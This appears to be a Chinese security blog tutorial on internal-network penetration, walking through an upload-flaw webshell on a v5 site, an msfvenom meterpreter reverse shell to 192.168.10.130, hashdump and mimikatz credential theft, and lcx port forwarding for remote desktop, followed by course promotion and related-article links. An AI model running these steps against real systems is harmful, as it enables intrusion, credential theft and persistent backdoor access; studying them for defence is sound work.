行业解决方案-渗透内网漏洞扫描-零基础信息安全自学路线

于 2024-05-15 10:02:37 发布
阅读量245 收藏 9
点赞数 4
文章标签: 漏洞 端口 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/saystan/article/details/138896259
版权

行业解决方案-渗透内网漏洞扫描-零基础信息安全自学路线

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

内网渗透思路

本次内网渗透的思路为:通过信息收集对网站进行分析,通过攻击外网服务器,从而获取外网服务器的权限,然后利用入侵成功的外网服务器作为跳板来攻击内网其他服务器,最后获得敏感数据(系统密码等),看情况安装后门木马或者后门软件,实现长期控制和获得敏感数据的方式。

还有一种内网渗透的思路为:通过社工等方法攻击企业办公网的电脑、办公网无线等,实现控制办公电脑,再用获得的办公网数据。

渗透过程详解

本次渗透过程将分为—->—->提权

访问某网站,该网站利用的是 v5系统建站,创建一个新的用户进行测试。

_渗透内网设备_渗透内网漏洞扫描

初步判断该网页模板为 v5建站系统,然后注册一个新的用户,方便我们利用 v5系统的文件上传漏洞

参考链接:blog.csdn.net/…

_渗透内网设备_渗透内网漏洞扫描

文件上传漏洞在会员头像处,所以先注册一个账号然后登录后上传我们的一句话木马

渗透内网设备_渗透内网漏洞扫描_

最开始的文件格式是0x0.png

通过burp代理拦截将tx后面的image/png换成image/php即可

渗透内网设备__渗透内网漏洞扫描

输入参数v=();验证成功

渗透内网漏洞扫描__渗透内网设备

验证上传成功后,打开菜刀软件输入上传的网站路径和参数(一句话木马的密码),可以连接服务器

在菜刀软件上可以进行数据库的提权,如mof提权、udf提权、启动项提权等

渗透内网设备_渗透内网漏洞扫描_

编写免杀木马

通过连接目标服务器,但是访问的数据有限,仅仅是站点的系统账户权限,访问的系统路径也有限,于是我们可以编写免杀木马来进行反弹shell木马su.exe

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe >/root/Desktop/su.exe

渗透内网漏洞扫描_渗透内网设备_

利用刚刚连接菜刀的操作,在文件管理中上传我们需要的工具

渗透内网设备_渗透内网漏洞扫描_

进入攻击模块,配置参数

use exploit/multi/handlerSet payload/windows/x64/meterpreter/reverse_tcpSet lport 4444Set lhost 192.168.10.130run

渗透内网设备__渗透内网漏洞扫描

可以利用菜刀的虚拟终端模拟服务器点击免杀木马的操作,让木马生效

渗透内网漏洞扫描_渗透内网设备_

run执行监听

_渗透内网设备_渗透内网漏洞扫描

获取密码过程

hashdumpload mimikatzkerberos

渗透内网漏洞扫描_渗透内网设备_

注:如果的远程桌面操作是不允许连接到这台计算机,那么开启端口转发也是没用的

_渗透内网漏洞扫描_渗透内网设备

渗透内网设备_渗透内网漏洞扫描_

开启远程桌面

_渗透内网漏洞扫描_渗透内网设备

渗透内网设备_渗透内网漏洞扫描_

渗透内网设备__渗透内网漏洞扫描

思路一:利用模块执行远程连接

然后开启端口转发,-l(本地端口)-p(远程控制端口)-r(目标主机)

靶机3389端口转发发送到本地的5555端口

渗透内网漏洞扫描_渗透内网设备_

-u 用户名 -p 密码 127.0.0.1:5555 连接本地的5555端口开启远程桌面

_渗透内网漏洞扫描_渗透内网设备

利用开启远程桌面,需要利用lcx工具,现在shell模式下输入指令

靶机执行lcx.exe -slave 192.168.10.20 5555 192.168.10.10 3389

_渗透内网漏洞扫描_渗透内网设备

思路二:利用lcx工具执行远程连接

攻击机执行lcx.exe. - 5555 33891,接着打开mstsc连接127.0.0.1 :33891

渗透内网漏洞扫描_渗透内网设备_

_渗透内网漏洞扫描_渗透内网设备

以下为连接成功和监听数据的发送

渗透内网漏洞扫描_渗透内网设备_

渗透内网漏洞扫描__渗透内网设备

总结

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

网络安全学习路线图(思维导图)

网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。

1. 网络安全视频资料

2. 网络安全笔记/面试题

3. 网安电子书PDF资料

如果你向网安入门到进阶的全套资料,我都打包整理好了,需要学习的小伙伴可以V我找我拿~

学网络安全/学黑客,零基础资料整理来啦~~~

~

程序员六七
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
[网络安全自学篇] 二十三.基于机器学习的恶意请求识别及安全领域中的机器学习
热门推荐
杨秀璋的专栏
11-01 1万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了Web渗透的第一步工作,涉及网站信息、域名信息、端口信息、敏感信息及指纹信息收集。这篇文章换个口味,将分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。
局域网漏洞扫描
01-27
快速入侵局域网局域网漏洞扫描器,可用可扫
windows渗透测试
Aluxian_的博客
05-25 9197
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080端口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透
WEB网络渗透
zzzzzzcq的博客
03-03 2208
NS(Domain NameSystem,域名系统),万维网上作为域名和IP地址相互映射的一个分布式数据库,用于TCP/IP网络,它所提供的服务是用来将主机名和域名转换为IP地址的工作 网络通讯大部分是基于TCP/IP的,而TCP/IP是基于IP地址的,所以计算机在网络上进行通讯时只能识别如“111.13.100.91”之类的IP地址,而不能认识域名。而在浏览器端输入域名即可跳转到正确网站的原因就在于DNS系统,他会自动把我们的域名“翻译”成了相应的IP地址,然后调出IP地址所对应的网页。域名系统作为一.
搭建内网安全漏洞扫描系统
UsamaBinLaden6976498的专栏
08-12 1555
巡风是一个开源的安全漏洞扫描平台,支持自定义扩展插件,可以用来快速扫描被纳管的内网电脑和服务器。 我在 2017 年的时候为上海的老东家搭建过这个平台,那时候这个项目刚刚兴起,在公司业务中只用它来作为扫描引擎使用,后台的病毒库对比则是采购了某实验室的商业支持病毒对比库。最近整理自己的工作笔记,发现了当初研究这个平台的学习笔记,又特地访问了这个项目,发现项目已经停止开发1年多了。尽管它失去了技术支持热度,但作为内网扫描工具还是不错的。 现在要安装部署这个巡检平台,会遭遇到 Python 的支持问题。 由于
内网主动信息收集之使用fscan进行漏洞扫描
m0_74220316的博客
11-22 8376
下载链接:https://github.com/shadow1ng/fscan一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
2022网络安全技术自学路线图及职业选择方向
欢迎来到技术宅的博客
03-18 1万+
每天都有新闻报道描述着新技术对人们的生活和工作方式带来的巨大乃至压倒性影响。与此同时有关网络攻击和数据泄露的头条新闻也是日益频繁。 攻击者可谓无处不在:企业外部充斥着黑客、有组织的犯罪团体以及民族国家网络间谍,他们的能力和蛮横程度正日渐增长;企业内部是员工和承包商,无论有意与否,他们都可能是造成恶意或意外事件的罪魁祸首。 那作为一个零基础的小白,此时适合进入网络安全行业吗,它的就业前景怎么样,应该怎么选择适合自己的岗位? 本文将针对这几个问题,逐一进行解答,希望能够对大家有帮助。 (友情提示,全文五
网络安全技术自学路线图及职业选择方向
bluemoon_0的博客
03-17 320
网络安全技术自学路线图及职业选择方向
[网络安全自学篇] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三篇文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这篇文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
局域网内批量扫描永恒之蓝(勒索病毒)漏洞脚本
05-17
依据腾讯发布的勒索病毒漏洞扫描工具,编写了一个简单的批量扫描脚本,可以扫描C类网所有电脑是否存在漏洞需要修复,可根据实际需要修改IP地址范围。扫描结果以txt文件保存。 运行scannsa.bat,依次输入: 1.C类IP地址段,例如:192.168.1 2.起始IP,例如:2(默认为1) 3.结束IP,例如:254(默认为255)
内网扫描工具
09-25
#网络资产信息扫描渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
6款漏扫工具来了!(附下载)_内网漏洞扫描工具
最新发布
2401_84240129的博客
04-12 701
北极熊是一款综合性的扫描工具,前期的信息收集我们也提到过,那里我们说它是一款爬虫工具有些片面了,也许是我经常用它来爬虫,其实它也集成了网站检测和漏洞扫描功能,只不过它得一步一步的使用,首先对目标站点进行爬虫,再将爬虫过的结果导入网站检测当中扫描,也可以根据前期信息收集情况,选择对应的选项,提高扫描效率,北极熊扫描器也可以通过网上搜索下载。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
小白必读记——内网渗透漏洞扫描类(Burpsuite工具讲解,初学篇)
weixin_45900492的博客
11-28 2420
信息搜集讲过之后,然后就是不得不提的必备工具 Burpsuite工具 首先我们先讲这个必备神奇工具,其他后面在讲! 无论多简单还是多复杂的,一定要多多练习。 1.1 Burpsuite 注:现在有汉化版的,建议小白可以用。 1.1.1 功能介绍 Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,...
Windows渗透测试
Dark0518的博客
11-15 4303
接上文,上一篇文章,我们了解了软件渗透测试的相关入门基础,那这篇文章我们就来聊聊对于Windows的渗透测试吧 首先,还是我们的开头三问:是什么、为什么、如何做? Windows服务是什么? 一、什么是windows服务 windows服务的作用: (1)服务决定了计算机的一些功能是否被启用 (2)不同的服务对应的功能不同 (3)通过计算机提供的服务可以有效实现资源共享 常见的服务: web服务、dns服务、dhcp服务、邮件服务、telnet服务、ssh服务、smb服务 二、端口(1)端口
小白必读记——内网渗透漏洞扫描类(AWVS工具使用)
weixin_45900492的博客
11-28 3213
扫描类必备工具,好多公司基本上都会用着的 AWVS神器 下面开始把板凳准备好: AWVS功能介绍 简介这些鸡汤我们就不说了,直接实战!!!!! 这个我会讲的很详细,全场看图 优劣势 优势:  功能灵活强大,支持多种目标,大量计算机的同时扫描;  流行,由于其具有强大的扫描机探测功能,,已被成千上万安全专家使用。 劣势:  英文界面,使用较难 1.2.1 功能介绍 AWVS是一个自动化的We...
记一次某竞赛中的渗透测试(Windows Server 2003靶机漏洞
m0_73734159的博客
01-31 1994
SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口
Windows操作系统渗透测试
m0_65422235的博客
03-18 871
Windows操作系统渗透测试
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值